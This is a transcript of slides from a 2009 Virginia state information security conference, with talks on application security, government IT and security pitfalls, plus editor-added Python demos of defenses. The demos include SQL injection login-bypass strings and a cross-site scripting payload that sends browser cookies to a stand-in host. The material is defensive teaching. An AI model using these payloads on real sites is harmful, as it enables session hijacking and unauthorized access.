First Annual Commonwealth Information Security Conference - PowerPoint PPT Presentation

Slides: 175
Provided by: walterku

Transcript and Presenter's Notes
1
First Annual Commonwealth Information Security Conference
www.vita.virginia.gov
2
Agenda
  • Walter Kucharski: Top 10 Commonwealth Information
    Security Issues/Opportunities/Concerns/Risks
  • John Green: Application Security: Why Firewalls
    Aren't Enough Anymore
  • Keynote: Gino Menchini: Government IT: The New
    Expectations and Challenges
  • Randy Marchany: Unintended Consequences: Don't
    Create New Risks
  • Eric Taylor: IT Seppuku: Why Do We Still Suffer
    Security Violations
  • Bob Baskette: Social Engineering: Building Bridges
    to Confidential Data

3
Commonwealth Information Security Conference
  • November 2, 2009

4
AGA Top Ten List -- 2009
  1. STIMULUS MONEY -- ARRA
  2. DATA SECURITY
  3. VITA/NORTHROP GRUMMAN
  4. ENTERPRISE APPLICATION/DATA EXCHANGE STANDARDS
  5. MORE TIMELY FINANCIAL INFORMATION

AUDITOR OF PUBLIC ACCOUNTS
5
AGA Top Ten List -- 2009
  6. ADMINISTRATIVE DUTIES CONSOLIDATION
  7. SUCCESSION PLANNING
  8. PERFORMANCE MANAGEMENT / MEASURES
  9. CONTRACT MANAGEMENT
  10. PPEA / PPTA

6
The FUTURE -- 2009
  • Financial statements will need to be completed
    and issued within 90 days and the single audit
    within 4 months
  • The State needs newer accounting systems and one
    sole enterprise application will probably not be
    the answer
  • Data security concerns will continue to grow
  • There will be increasing e-commerce and data
    exchange between federal, local and state
    government
  • Information technology infrastructure and systems
    will become commodities and shared

7
Concerns
  • WHAT IS PRIVACY?
  • WHAT IS TRANSPARENCY?

8
Concerns
  • DATA SECURITY -- Employees
  • VITA/NORTHROP GRUMMAN
  • DATA EXCHANGE STANDARDS
  • MORE TIMELY FINANCIAL INFORMATION
  • CONSOLIDATING ADMINISTRATIVE DUTIES

9
Concerns
  • ACCOUNTING/ WORKFLOW SYSTEM CONTROLS WILL REPLACE
    MANUAL CONTROLS
  • E-COMMERCE AND DATA EXCHANGE BETWEEN FEDERAL,
    LOCAL AND STATE GOVERNMENT
  • SHARED INFORMATION TECHNOLOGY INFRASTRUCTURE AND
    SYSTEMS AS COMMODITIES

10
What is an ISO
  • Paper pusher or Policeman
  • Management Oversight or One of the Gang
  • Tail-end Reviewer or System Developer and
    Guardian
  • Risk Manager or Elephant Parade Cleaner

11
Application Security: Why Firewalls Are Not Enough
  • John Green
  • Chief Information Security Officer
  • Commonwealth of Virginia

12
Todays Agenda
  • Introduction
  • Lessons From History
  • Threats and Vulnerabilities
  • Opportunities For Mitigation
  • Resources
  • Questions

13
Application Vulnerabilities Skyrocketing!
  • Web vulnerabilities have increased from 1.9% of
    all published vulnerabilities in 2006 to over 52%
    in 2009.
  • Application vulnerabilities from 2007 to 2008
    increased by 154%.
  • WhiteHat Security said about 70% of websites it
    scans are likely to have at least one critical
    website vulnerability.

Source: http://www.ncircle.com/index.php?s=solution_Web-Application-Vulnerability-Statistics
14
Largest Breaches In History
15
Why? Money!

16
Firewalls Are No Longer Enough
  • Firewalls have been around a while
  • Primary purpose: to stop unwanted traffic from
    crossing network boundaries
  • Hackers are walking right through them
  • Perimeter firewalls are necessary, but no longer
    sufficient!
  • History shows us why

17
Impenetrable Defenses Of France
"We could hardly dream of building a kind of
Great Wall of France, which would in any case be
far too costly. Instead we have foreseen powerful
but flexible means of organizing defense, based
on the dual principle of taking full advantage of
the terrain and establishing a continuous line of
fire everywhere." Maginot
18
21st Century Maginot Line
[Diagram: Internal Networks, Router, Router, Email, Web]
Maginot Line: term used now for something that is
confidently relied upon but ends up being
ineffective.
19
May 10, 1940 - What Went Wrong?
  • Defenses based on past threat
  • Perimeter protection
  • No layered defenses
  • Holes
    • Ardennes Forest
    • Belgium was an ally
  • Maginot Line never fell
    • Bypassed
    • Surrendered

20
Firewalls Do Not Stop Today's Threat
[Diagram: Internal Networks, DB Server, DB Server, Router, Router, Email, Web]
21
2008 Symantec Threat Report
  • 63 percent of vulnerabilities affected Web
    applications, an increase from 59 percent in 2007
  • There were 12,885 site-specific cross-site
    scripting vulnerabilities identified, compared
    to 17,697 in 2007. Of the vulnerabilities
    identified in 2008, only 3 percent (394
    vulnerabilities) had been fixed at the time of
    writing.
  • The education sector represented the highest
    number of known data breaches that could lead to
    identity theft, accounting for 27 percent of the
    total
  • The government sector ranked second and accounted
    for 20 percent of data breaches that could lead
    to identity theft.
  • Hacking ranked second for identities exposed in
    2008, with 22 percent; this is a large decrease
    from 2007, when hacking accounted for 62 percent
    of total identities exposed.

Source: http://www.symantec.com/business/theme.jsp?themeid=threatreport
22
OWASP Top 10 Application Flaws
  1. Cross Site Scripting (XSS): XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc.
  2. Injection Flaws: Injection flaws, particularly SQL injection, are common in web applications. Injection occurs when user-supplied data is sent to an interpreter as part of a command or query. The attacker's hostile data tricks the interpreter into executing unintended commands or changing data.
  3. Malicious File Execution: Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.
  4. Insecure Direct Object Reference: A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects without authorization.
  5. Cross Site Request Forgery (CSRF): A CSRF attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks.
  6. Information Leakage and Improper Error Handling: Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems. Attackers use this weakness to steal sensitive data, or conduct more serious attacks.
  7. Broken Authentication and Session Management: Account credentials and session tokens are often not properly protected. Attackers compromise passwords, keys, or authentication tokens to assume other users' identities.
  8. Insecure Cryptographic Storage: Web applications rarely use cryptographic functions properly to protect data and credentials. Attackers use weakly protected data to conduct identity theft and other crimes.
  9. Insecure Communications: Applications frequently fail to encrypt network traffic when it is necessary
  10. Failure to Restrict URL Access: Frequently, an application only protects sensitive functionality by preventing the display of links or URLs to unauthorized users. Attackers can use this weakness to access and perform unauthorized operations by accessing those URLs directly.

Source: http://www.owasp.org/index.php/Top_10_2007
23
WASC Application Vulnerability Statistics
Web Application Security Consortium (WASC)
Report 2008 includes data from 12,186 web
applications evaluated. Compared to 2007, the
number of sites with widespread SQL Injection
and Cross-site Scripting vulnerabilities fell by
13% and 20%, respectively; however, the number
of sites with different types of Information
Leakage rose by 24%. On the other hand, the
probability to compromise a host automatically
rose from 7% to 13%.

Source: http://projects.webappsec.org/Web-Application-Security-Statistics
24
SQL-injection Information
  • Can occur whenever client-side data is used to
    construct an SQL query without first adequately
    constraining or sanitizing the client-side input.
    The use of dynamic SQL statements (the formation
    of SQL queries by concatenating several strings of
    information) can provide the conditions needed to
    exploit the backend database that supports the
    web server.
  • SQL injection allows the execution of SQL
    code under the privileges of the system ID used
    to connect to the backend database.
  • Malicious input entered into a web form
    field, or inserted into the website's code, can make
    the database server execute a command shell or
    other arbitrary command.
  • In addition to command execution, this
    vulnerability may allow a malicious
    individual to change the content of the back-end
    database and therefore the information displayed
    by the website.

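Worked example, added here by the editor and not part of the original presentation: a login check written with dynamic SQL beside the same check written with a parameterized query, both run against a constructed in-memory SQLite table. The user names, passwords and the two payloads are made up for the demo. The first function lets a comment marker and a tautology rewrite the query; the second treats the same strings as literal values.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data for the demo, not from the original presentation."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, role TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("alice", "correct horse battery", "admin"), ("bob", "hunter2", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Dynamic SQL: the query text is assembled from client-side strings, so the
    client controls the *structure* of the statement, not just its values."""
    query = (
        "SELECT username, role FROM users "
        "WHERE username = '%s' AND password = '%s'" % (username, password)
    )
    return conn.execute(query).fetchall()


def login_parameterized(conn: sqlite3.Connection, username: str, password: str) -> list:
    """Parameterized query: the SQL text is fixed; values travel separately and
    are never parsed as SQL, whatever quotes or comment markers they contain."""
    query = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchall()


def demo() -> dict:
    """Runs both versions against the same two payloads and a legitimate login."""
    conn = make_db()
    # '--' comments out the password clause; the tautology matches every row.
    comment_bypass = ("alice' --", "wrong")
    tautology = ("x' OR '1'='1", "x' OR '1'='1")
    return {
        "vuln_comment": login_vulnerable(conn, *comment_bypass),
        "vuln_tautology": login_vulnerable(conn, *tautology),
        "safe_comment": login_parameterized(conn, *comment_bypass),
        "safe_tautology": login_parameterized(conn, *tautology),
        "safe_legit": login_parameterized(conn, "bob", "hunter2"),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:15} -> {rows}")
```

The passwords sit in clear text only to keep the demo short; that is the separate "Insecure Cryptographic Storage" item. Parameterization fixes the query structure but does nothing about the slide's second point, the privileges of the connecting account: the web application's database login should own only the tables and statements it needs, so that an injection found elsewhere cannot reach a command shell or rewrite content.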
25
Cross-Site Scripting (XSS)
  • Allows a malicious individual to utilize a
    website address that does not belong to the
    malicious individual for malicious purposes.
  • Cross-Site Scripting attacks are the result of
    improper filtering of input obtained from unknown
    or untrusted sources.
  • Cross-Site Scripting attacks occur when a
    malicious individual utilizes a web application
    to send malicious code, generally in the form of
    a browser-side script, to an unsuspecting user.
  • The parameters entered into a web form are
    processed by the web application, and the right
    combination of values can result in arbitrary
    script execution in the victim's browser.

26
Cross-Site Scripting (XSS)
  • The unsuspecting user's browser has no way to
    know that the script should not be trusted, and
    will execute the script.
  • Because the unsuspecting user's browser believes
    that the script came from a trusted source, the
    malicious script can access any cookies, session
    tokens, or other sensitive information retained
    by the unsuspecting user's browser for that site.
  • The injected code thus takes advantage of the
    trust given by the unsuspecting user to the
    vulnerable site. These attacks are usually
    targeted at the users of a web application
    rather than at the application itself.

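Worked example, added by the editor and not part of the original deck: the same greeting page rendered with and without output encoding, an attribute-context variant, and the Set-Cookie header that denies an injected script the session token the slides describe it stealing. The payload and the 203.0.113.9 collector address are constructed for the demo.

```python
import html
from http.cookies import SimpleCookie

# Constructed attacker input (not from the original presentation): a script that
# ships the victim's cookies to a host the attacker controls (RFC 5737 test range).
PAYLOAD = '<script>new Image().src="http://203.0.113.9/c?"+document.cookie</script>'


def render_unsafe(name: str) -> str:
    """Reflects the request parameter straight into the page body."""
    return f"<html><body><h1>Hello, {name}!</h1></body></html>"


def render_safe(name: str) -> str:
    """Same page, but the value is encoded for the HTML text context it lands in."""
    return f"<html><body><h1>Hello, {html.escape(name, quote=True)}!</h1></body></html>"


def render_attr_safe(value: str) -> str:
    """Attribute context: the attribute must be quoted AND the value's quotes
    encoded, otherwise a payload such as  " onfocus="alert(1)  breaks out."""
    return f'<input type="text" name="q" value="{html.escape(value, quote=True)}">'


def executes_as_markup(rendered: str) -> bool:
    """Crude check for the demo: does a live <script> tag reach the browser?"""
    return "<script" in rendered.lower()


def session_cookie_header(session_id: str) -> str:
    """Defense in depth for the cookie theft above: HttpOnly hides the token from
    document.cookie, Secure keeps it off plain HTTP, SameSite limits cross-site use."""
    c = SimpleCookie()
    c["session"] = session_id
    c["session"]["httponly"] = True
    c["session"]["secure"] = True
    c["session"]["samesite"] = "Lax"
    return c.output()
```

Encoding has to match the context the value lands in: html.escape is right for element text and quoted attributes, but a value placed inside a script block or a URL needs that context's encoding instead. HttpOnly does not stop the script from running; it only takes away the easiest prize. The encoding is the fix.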
27
Opportunities For Mitigation
  • Personnel Awareness Training
  • Systems Development Life Cycle
  • New Development
  • Application Procurement
  • Legacy Applications

28
Systems Development Life Cycle
  • Project Initiation
    • Classify the data that the system will process
    • Determine if sensitive data absolutely must be
      collected and/or stored
    • Perform risk analysis based on known requirements
      and classification of data
    • Develop an initial IT System Security Plan
  • Project Definition
    • Identify, document and incorporate security control
      requirements into IT System design specifications
    • Develop evaluation procedures to validate that
      security controls
    • Update the IT System Security Plan to include
      controls
  • Implementation
    • Execute the evaluation procedures
    • Conduct a risk assessment to evaluate overall
      system risk
    • Update the IT System Security Plan to include
      controls
  • Disposition
    • Require that data retention schedules are adhered
      to
    • Require that electronic media is sanitized prior
      to disposal

29
New Development
  • Push security involvement to the front end of
    development
  • Security Design (for sensitive systems)
    • Encrypted communication channels
    • Sensitive information shall not be stored in
      hidden fields
  • Application Development
    • Application-based authentication shall be
      performed for access to data that is not
      considered publicly accessible
    • Support inactivity timeouts on user sessions
    • Data storage must be separated from the
      application interface
    • Validate all input irrespective of source; focus
      on server-side validation
    • Implement a default deny policy for access
      control
    • Use the least set of privileges required for
      processing
    • Internal testing must include one of penetration
      testing, fuzz testing or source code auditing
    • Clear cached and temporary data upon exit
  • Production and Maintenance
    • Scan internet-facing sensitive applications
      periodically for vulnerabilities

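Worked example, added by the editor and not from the original presentation, combining three of the application-development requirements above: server-side sessions with an inactivity timeout, a role table that grants the least set of privileges, and an authorization check that denies by default. The 15-minute timeout, the user names and the permission names are assumptions chosen for the demo.

```python
import os

IDLE_TIMEOUT_SECONDS = 15 * 60  # assumed policy value; set it per data classification

# Constructed role and permission tables, not from the original presentation.
ROLES = {"alice": "admin", "bob": "analyst"}
PERMISSIONS = {
    ("admin", "reports:read"), ("admin", "reports:write"), ("admin", "users:manage"),
    ("analyst", "reports:read"),
}


class SessionStore:
    """Server-side sessions keyed by an unguessable token; every lookup enforces
    the inactivity timeout and refreshes the last-activity stamp on success."""

    def __init__(self):
        self._sessions = {}

    def create(self, user: str, now: float) -> str:
        token = os.urandom(32).hex()
        self._sessions[token] = {"user": user, "last_seen": now}
        return token

    def resolve(self, token: str, now: float):
        entry = self._sessions.get(token)
        if entry is None:
            return None
        if now - entry["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[token]      # idle too long: the session is gone for good
            return None
        entry["last_seen"] = now
        return entry["user"]

    def destroy(self, token: str) -> None:
        self._sessions.pop(token, None)


def authorize(store: SessionStore, token: str, action: str, now: float) -> bool:
    """Default deny: every missing or unknown piece (no session, expired session,
    user without a role, role without that permission) falls through to False."""
    user = store.resolve(token, now)
    if user is None:
        return False
    role = ROLES.get(user)
    if role is None:
        return False
    return (role, action) in PERMISSIONS


def walkthrough() -> dict:
    """Exercises the checks with fixed timestamps so the outcome is deterministic."""
    store = SessionStore()
    t0 = 1_700_000_000.0
    alice = store.create("alice", t0)
    bob = store.create("bob", t0)
    return {
        "admin_writes": authorize(store, alice, "reports:write", t0 + 60),
        "analyst_writes": authorize(store, bob, "reports:write", t0 + 60),
        "unlisted_action": authorize(store, alice, "backups:restore", t0 + 60),
        "forged_token": authorize(store, "0" * 64, "reports:read", t0 + 60),
        # bob's last activity was at t0+60; sixteen idle minutes later the session is dead
        "idle_expired": authorize(store, bob, "reports:read", t0 + 60 + 16 * 60),
        # and it stays dead even if he comes back a second later
        "still_dead": authorize(store, bob, "reports:read", t0 + 60 + 16 * 60 + 1),
    }
```

The permission table is the least-privilege statement: an action that nobody listed is denied for everyone, including administrators, until someone deliberately adds it. Keeping the session on the server side (rather than in a hidden field or a client-readable cookie) is what makes the timeout and the revocation enforceable.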
30
Applications Procurement
  • Work to incorporate language into contracts that
    includes
    • General
      • Personnel, Security Training, Background Checks
      • Vulnerabilities, Risks and Threats
    • Application Development
      • Development Environment
      • Secure coding, Configuration management,
        Distribution, Disclosure, Evaluation
    • Testing
      • General, Source Code, Vulnerability and
        Penetration Test
      • Patches and Updates
      • Tracking Security Issues
    • Delivery Of The Secure Application
      • Self Certification
      • No Malicious Code
    • Security Acceptance And Maintenance
      • Acceptance
      • Investigating Security Issues

Source: http://www.sans.org/appseccontract/
31
Legacy Applications
  • Periodic application vulnerability scanning
  • Strong configuration management
  • If vulnerabilities are identified
    • Each application may have specific challenges
    • Case by case analysis may reveal options
      • Easy fix
      • Virtualization
      • Host based intrusion prevention
      • Application firewall technology
      • Third party integration
      • Other technology

32
Resources
33
www.OWASP.org
34
2009 CWE/SANS Top 25
35
http://iase.disa.mil/stigs/checklist/
36
http://trustedsignal.com/secDevChecklist.html
Recommended!
37
Organizational Resources
  • Agency Information Security Officer
  • Commonwealth Security and Risk Management
  • Other Resources?
  • CommonwealthSecurity@vita.virginia.gov

38
Conclusions
  • Largest breaches in history due to application
    vulnerabilities
  • Firewalls are necessary but won't protect
    vulnerable applications
  • SQL injection and Cross Site Scripting top the
    lists of vulnerabilities measured and attacked
  • Many opportunities to address the problem of
    insecure code
  • Plenty of resources to help, USE THEM!

39
GEN. Patton on Usefulness of Firewalls
"Fixed fortifications are monuments to the
stupidity of man."
40
Questions?
  • Thank You!
  • John.Green@vita.virginia.gov

41
IT'S ALL ABOUT SERVICE
DRAFT for Review_v.4
Gino Menchini, Managing Director
42
The City of New York
  • Resident population of over 8 million; daytime
    population of 10 million
  • Over 350,000 City employees, 300,000 retirees
  • New York City Government includes its 5 counties
  • The 1 million student school system reports to
    the Mayor
  • Annual budget exceeds $59.5 billion
  • If New York City was a private sector
    corporation, it would be in the Top 30 of the
    Fortune 500 companies
  • Over 120 agencies, offices, and organizations
    make up The City


43
New York City as a Bellwether Local Government:
IT on Steroids
  • New Breed of Leadership: Significant expansion
    in the role of IT
    • Mayor Michael R. Bloomberg: Business and IT
      experience
    • Younger commissioners, senior staff, and
      legislators demand more of IT
  • Higher expectations on Government from the public
    • They demand to perform transactions seamlessly
      through the Government walk-in, web and call
      centers
    • Public's perception of the competency of an
      administration is increasingly shaped by the ease
      of access/response


44
The role of IT in Emergency Response and
Preparedness
  • Focus on Public Safety Technologies
    • 911 CAD systems and infrastructure - 311
    • First Responder Radio infrastructure
    • Command and Control Communications
  • Greater Dependence on
    • GIS
    • Email, Blackberries
  • New Technologies
    • Video Surveillance Systems, Sensor systems
    • Hospital Emergency Room monitoring systems
    • AVL
    • Emergency Management Systems
    • Real time Crime Center
    • Intelligent Transportation systems
    • Access control systems
  • Telecomm carrier infrastructure survivability
    post 9/11
  • Municipal IT infrastructure Redundancy/Survivability


45
New York City as a Bellwether Local Government:
IT on Steroids
  • IT is now at the decision making table. Are we
    ready?
  • Guide and manage a larger volume of IT projects
    simultaneously while advancing our IT Strategy
  • Be prepared to deliver IT projects rapidly; high
    availability systems
  • Provide solutions to address the problem of the
    day. Be relevant


46
NYC Department of Information Technology and
Telecommunications - Then
47
The role of the NYC Department of Information
Technology and Telecommunications - Now
48
New technologies implemented rapidly
49
New York Citys Agencies and IT
  • Highly diverse range of services, unlike private
    sector.
  • Virtually the entire range of Government Public
    Sector Services are provided by New York City
    from Child care to Anti-terrorism, Street
    cleaning to fresh water reservoirs.
  • Agencies are organized and staffed to focus on
    their area of responsibility and specialization
    (silos).
  • Specialized agency specific IT applications need
    to be implemented and supported by agencies.
  • High availability is required. Security is
    expected.

50
Unintended Consequences: Don't Create New Risks
  • Randy Marchany, VA Tech IT Security Office

51
What People Think of Security
[Diagram: Internal Network, "The Firewall will protect us!", The Big Bad Internet]
52
What I meant is not what I said
  • Schneier's article
    • http://www.schneier.com/essay-210.html
  • Google street view
  • County records
  • Account lockout: the easy DoS
  • SSN finders or SSN generators?
  • Fundrace.org
  • P2P
  • Spammers and FOIA
  • Classroom locks?
  • Emergency Messaging Systems


53
Inside the Twisted Mind
  • Security mindset involves thinking how things
    can be made to fail
  • Otherwise, you never notice most security
    problems
  • Designers are so focused on making systems work
    that they don't notice how they might fail
  • They don't notice how those failures might be
    exploited


54
Inside the Twisted Mind...
  • Uncle Milton's Ant Farm
    • You filled out a card with your address and
      they'd mail you some ants, but...
    • They'll send a tube of live ants to anyone you
      tell them to
  • Smartwater
    • Liquid with unique ID linked to an owner
    • I'll paint mine on YOUR stuff and then call the
      police


55
Inside The Twisted Mind
  • Auto Dealership Service Centers
  • Get my car by giving them my name
  • Get your car by giving them your name
  • Laser Printers
  • Use their disks for your storage
  • City Surveillance
  • Who watches the watchers?
  • Can you corrupt stored camera images?

58
Account Lockout
  • What's the purpose of the lockout?
  • Log failed attempts?
    • Multiple entries in a short period of time
      usually indicate a brute force attack
  • Password strength rules in effect?
    • Designed to prevent guessable passwords

59
Account Lockout
  • How long does it take to reset the account?
    • Minutes?
    • Hours?
    • Forever?
    • After hours?
  • So, what if my attack is to lock you out?

60
Account Lockouts
  • Account Lockout Policy: a 25-year defense
  • Old Unix systems had no password controls, so this
    was the only defense against brute force guessing
  • AIX 3.1 (1993) was one of the first with
    password controls
  • Why are we still using a 25-year defense if the
    other controls are more effective?
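Worked example, added by the editor and not part of the original deck: the "lock you out" attack from the slides simulated against a classic hard lockout and against a per-source throttle. The addresses come from the RFC 5737 documentation ranges and the timestamps are fixed, so the outcome is reproducible; thresholds and delays are assumed values.

```python
from collections import defaultdict, deque


class HardLockout:
    """Classic policy: N failures lock the account for a fixed period, no matter
    where the failures came from. Anyone who knows a username can trigger it."""

    def __init__(self, threshold: int = 5, lock_seconds: int = 15 * 60):
        self.threshold = threshold
        self.lock_seconds = lock_seconds
        self.failures = defaultdict(int)
        self.locked_until = {}

    def attempt(self, username: str, source_ip: str, password_ok: bool, now: float) -> str:
        if self.locked_until.get(username, 0.0) > now:
            return "locked"
        if password_ok:
            self.failures[username] = 0
            return "success"
        self.failures[username] += 1
        if self.failures[username] >= self.threshold:
            self.failures[username] = 0
            self.locked_until[username] = now + self.lock_seconds
            return "locked"
        return "failed"


class SourceThrottle:
    """Alternative: slow guessing down per (source, account) with an exponential
    delay inside a sliding window. The account itself is never disabled, so a
    third party cannot lock the legitimate user out from somewhere else."""

    def __init__(self, window_seconds: int = 60, free_attempts: int = 3, max_delay: int = 300):
        self.window = window_seconds
        self.free_attempts = free_attempts
        self.max_delay = max_delay
        self.recent = defaultdict(deque)   # (source_ip, username) -> failure timestamps

    def attempt(self, username: str, source_ip: str, password_ok: bool, now: float) -> str:
        q = self.recent[(source_ip, username)]
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) >= self.free_attempts:
            delay = min(self.max_delay, 2 ** (len(q) - self.free_attempts))
            if now - q[-1] < delay:
                return "throttled"          # not evaluated, so the guess teaches nothing
        if password_ok:
            q.clear()
            return "success"
        q.append(now)
        return "failed"


def simulate(policy, attacker_tries: int = 10):
    """Constructed scenario: an attacker at 203.0.113.5 hammers alice's account
    once a second, then alice logs in correctly from her own address."""
    t = 1_000.0
    attacker = [policy.attempt("alice", "203.0.113.5", False, t + i) for i in range(attacker_tries)]
    victim = policy.attempt("alice", "198.51.100.7", True, t + attacker_tries)
    return attacker, victim


if __name__ == "__main__":
    for policy in (HardLockout(), SourceThrottle()):
        attacker, victim = simulate(policy)
        print(f"{type(policy).__name__}: attacker={attacker} victim={victim}")
```

The throttle removes the single-source denial of service without handing out free guesses, but an attacker with many addresses still gets a few tries from each, so it belongs beside the other controls on the slide: strong password rules, alerting on bursts of failures against one account, and a notification to the account owner. A lockout the victim cannot clear until the help desk opens is the worst of both.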

61
SSN Finders or SSN Generators?
  • Software to search for sensitive data on
    computers
  • Can they be used to generate SSN/CCN?
  • Freeware
  • VT Find_SSNs
  • Cornell Spider
  • UT-Austin SENF
  • Commercial
  • IdentityFinder

62
Inside the Twisted Mind
67
P2P or P@!@()P
  • Ban it, says the RIAA/MPAA!
  • Extension divisions use P2P to distribute
    videos/recordings to farmers
  • YouTube
  • Independent bands use P2P to sell or distribute
    their music
  • Ban P2P... bring on the antitrust lawsuits
  • "You're restricting my ability to market my
    product"


68
Spammers and FOIA
  • A known spammer issued a FOIA request for all U
    of Texas faculty, staff and student email addresses
  • Same thing happened in VA


69
Antivirus Software Threat?
  • My job is to test security tools
  • AV Software deletes my tools because it thinks it
    knows better than me.
  • "We know what's good for you" syndrome
  • It's a race to create the exception list ?


70
Things That Make You Go Hmmm
  • Locks on doors
    • Bulletproof doors included?
    • Likelihood of mugging vs. worse
  • Dealing with 2 separate incidents
    • First event happened 7am
    • Second event happened 9:30am almost ¾ mile away
      from the first event
    • Insider attack


71
Campus Lockdown?
Yes, it's an Airport
Approx. 2 miles
74
Understand Your Audience
  • Security Process without regard to Business
    Process
  • Business Processes rule the world
  • Physical security rules can be translated to
    cybersecurity rules
  • IT people focus on technology, not the business
    process. Wrong!
  • Business process doesn't consult IT when buying
    new gadgets


75
Use Risk Analysis to Build DR Plan
[Diagram: Business Process A, B and C mapped onto Oracle DB, Forms Servers and Auth Servers, which in turn run on Hosts A through F]
76
We have met the enemy and it is vendors..
77
It's Insecure Out of the Box
  • Viruses will never be eliminated
    • Multibillion-dollar industry to fight them
    • Eliminate the threat, and we no longer have a
      multibillion-dollar industry.
  • Wireless cash register software sending data in
    the clear
  • Document imaging systems sending data in the
    clear
  • Govt/LE records digitized by insecure software
  • Printers, copiers based on NT!


78
It's Insecure Out of the Box
  • Security vs. Convenience
  • Let the users debug the code
  • OS vendors are starting to see the light
    • Windows XP/2003 with security features enabled
    • Apple OSX
    • Linux systems with firewall enabled
  • Application Vendors still don't get it
    • Oracle stepped in it
    • http://news.com.com/Whensecurityresearcherbecometheproblem/2010-1071_3-5807074.html


79
Why is this an option? This should be the
default! Wait! I already know the last 4 digits
of my SSN so why have this at all?
82
Unlocked Key Means Transmission In the Clear!
83
Let Me Read Your Email!
84
Why buy the cow when you can get the milk for
free?
90
Obtaining Personal Information
  • Public Records can be accessed from anywhere in
    the world.
  • Local governments are allowing access to
    sensitive info via the Web without thinking about
    security.

91
County Clerks and Identity Theft
  • Making legal docs available on the net w/o good
    security practices.
  • A secure www site isn't enough
  • Tom DeLay: SSN from public records
  • Jeb Bush: SSN from public documents
  • Colin Powell: deed of trust
  • Colin Powell: SSN from public records
  • Do County Clerks (by extension, the state
    legislature) facilitate ID Theft?


92
What's Going On Here?
  • We're spending to protect sensitive data
    (SSN) but...
  • State govt is allowing SSN info to be obtained
    online so...
  • Laws need to be coordinated but...
  • Update: VA passed a law (7/1/08) that makes it
    illegal to distribute SSNs legally obtained from
    public govt www sites ?


94
The Twisted Mind
  • "If you're not doing anything illegal, you
    shouldn't care whether you're surveilled"
  • What if I just want to track you?
  • NY Times article on bored security staff tracking
    people on the streets.


95
T-Mobile said the company's computer forensics
and security team were "actively investigating to
determine how Ms. Hilton's information was
obtained."
96
The Twisted Mind
  • Smart phones and PDAs have become the electronic
    equivalent of the sticky note
  • Put my passwords in the device
  • What if I drain your battery?

97
Virtualization
  • Use it to check for unintended consequences
  • Build test systems, then apply Schneier's rule to
    them
  • Let's see a demo...


98
Should We Give Up?
  • NO! But examine solutions carefully to make sure
    you don't introduce a worse threat
  • Knee-jerk solutions cause worse problems
  • Apply Schneier's rules to your solution


99
Should We Give Up?
  • NO! Hold vendors accountable for their bad
    security practices
    • Insecure code
    • Stolen developer laptop syndrome
    • They modify their EULA
  • We just don't buy the product.


100
Should We Give Up?
  • NO! Increase User Awareness training.
    • Customize it. What makes sense at VT might not
      make sense in your house.
    • Helps your overall security posture.
  • If we do security for the end user, they'll never
    change their behavior.
  • All security is local.
    • A Tip O'Neill twist


101
Questions?
  • Randy Marchany, VA Tech IT Security Office Lab,
    1300 Torgersen Hall, VA Tech, Blacksburg, VA
    24060
  • 540-231-9523
  • marchany@vt.edu
  • http://security.vt.edu


102
IT Seppuku: Why Do We Still Suffer Security
Violations?
Eric Taylor, Enterprise Security Architect,
Northrop Grumman
103
Agenda
  • Introduction
  • Evolution of computer attacks
  • The Commonwealth over the last year
  • How Do We Avoid Security Violations

104
Cybergovernment
105
Cybercommunity
106
Cybereconomy
107
Cybergeeks
108
Cybersickness
109
Cyberbaby
110
Cyberdefense
111
Cyberspace
112
Cyberwarfare
113
Cybersabotage
114
Cybercrime
115
Cybercriminal
116
Cybertherapist
117
Cyberwarrior
118
Cybersuicide
119
Disclaimer
  • No such thing as a secure system
  • Security is hard, but the basics are easy and
    still need attention.
  • Attacks are not always technical, non-technical
    means can be used
  • Attacks take the path of least resistance

120
Evolution of computer attacks
  • Hacking for Fun (1970-1995)
    • The goal was to gain access
    • Motivation was mainly curiosity
    • Methods: phreakers, password guessing, bad
      configurations, viruses, trojan horses, insecure
      networks.
  • Lessons Learned
    • New Laws: Congress passes the Computer Fraud and
      Abuse Act


121
Evolution of computer attacks
  • Casual Hacking (1995-2000)
    • The goal was to gain access, defacement,
      disruption.
    • The motivation was showing off, education,
      publicity and money.
    • Methods: buffer overflows, email viruses /
      attachments, AOHell, Back Orifice
  • Lessons Learned
    • There is a need for compromise detection
      (intrusion detection)
    • Software security through better tools and
      languages


122
Evolution of computer attacks
  • Hacking (2001-2005)
    • The goal was to attract attention through
      large-scale activities.
    • Motivation: publicity and money
    • Methods: DoS, worms, rootkits, etc.
  • Lessons Learned
    • Service Denied
    • Bill Gates decrees that Microsoft will secure its
      products and services, and kicks off a massive
      internal training and quality control campaign.


123
Evolution of computer attacks
  • Professional hacking (2005 - ??)
    • The goal is system compromise, identity theft,
      information exfiltration, and Advanced Persistent
      Threat (APT)
    • Motivation is
    • Methods: web attacks, phishing / pharming,
      spear-phishing, etc.
    • Malware, drive-by downloads, FakeAV
    • Large-scale botnets, hacker service networks
    • Conficker worm infiltrated millions of PCs
      worldwide


124
Commonwealth over the last year
  • Malware / Worms
    • Over a three month period, 1,335 total unique
      infections (FakeAV and others)
    • Conficker
    • FakeAV
  • Mobile Devices
    • USB drives
    • Lost flash drives
    • Conficker
    • Stolen or lost laptops
  • Insecure configurations
    • Systems not locked down before production


125
Commonwealth over the last year
  • Information leakage
    • Posting sensitive information to public website
    • Human Error
  • Application Security
